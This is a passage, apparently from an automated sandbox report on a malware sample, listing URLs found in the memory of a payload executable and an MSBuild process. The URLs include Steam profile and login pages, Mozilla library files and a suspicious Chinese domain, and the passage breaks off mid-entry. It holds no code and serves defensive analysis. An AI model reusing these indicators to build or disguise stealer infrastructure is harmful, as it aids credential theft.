Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032B3000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021825975.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, CGDHIE.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1864612116.0000000003332000.00000004.00000020.00020000.00000000.sdmp, AAKEGI.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://help.steampowered.com/en/
Source: CGDHIE.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001308000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199747278259[1].htm.0.dr String found in binary or memory: https://steamcommunity.com/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 